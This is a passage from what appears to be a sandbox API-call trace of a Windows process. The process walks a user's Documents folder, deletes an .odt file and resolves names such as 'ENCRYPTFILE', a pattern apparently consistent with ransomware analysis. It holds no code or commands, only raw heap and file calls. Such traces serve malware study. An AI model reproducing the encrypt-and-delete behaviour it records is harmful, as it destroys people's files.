Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9660 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.584] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac7bf90, ftCreationTime.dwHighDateTime=0x1d5ece1, ftLastAccessTime.dwLowDateTime=0x9abd5c50, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x9abd5c50, ftLastWriteTime.dwHighDateTime=0x1d5e624, nFileSizeHigh=0x0, nFileSizeLow=0x5570, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bVjgYdkDx.odt", cAlternateFileName="BVJGYD~1.ODT")) returned 0x41ac180 [0082.585] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\bvjgydkdx.odt")) returned 1 [0082.635] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac7bf90, ftCreationTime.dwHighDateTime=0x1d5ece1, ftLastAccessTime.dwLowDateTime=0x9abd5c50, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x9abd5c50, ftLastWriteTime.dwHighDateTime=0x1d5e624, nFileSizeHigh=0x0, nFileSizeLow=0x5570, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="bVjgYdkDx.odt", cAlternateFileName="BVJGYD~1.ODT")) returned 0 [0082.635] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9888 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0082.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0082.635] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 1 [0082.635] TranslateMessage (lpMsg=0x144ebd4) returned 0 [0082.636] DispatchMessageW (lpMsg=0x144ebd4) returned 0x0 [0082.636] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0082.636] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0082.636] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0082.636] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccec8 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0082.636] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.636] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.636] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0082.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0082.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43ccec8 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0082.637] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.638] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.638] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeefb1990, ftCreationTime.dwHighDateTime=0x1d5f049, ftLastAccessTime.dwLowDateTime=0x2b265b0, ftLastAccessTime.dwHighDateTime=0x1d5ec12, ftLastWriteTime.dwLowDateTime=0x2b265b0, ftLastWriteTime.dwHighDateTime=0x1d5ec12, nFileSizeHigh=0x0, nFileSizeLow=0x157d3, dwReserved0=0x0, dwReserved1=0x8, cFileName="F0N0.rtf", cAlternateFileName="")) returned 0x41ac180 [0082.638] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0082.638] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0082.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0082.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0082.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.639] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0082.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.639] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0082.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ae0 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0082.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.640] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.641] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.641] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.641] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0082.642] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.642] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.642] RtlAllocateHeap 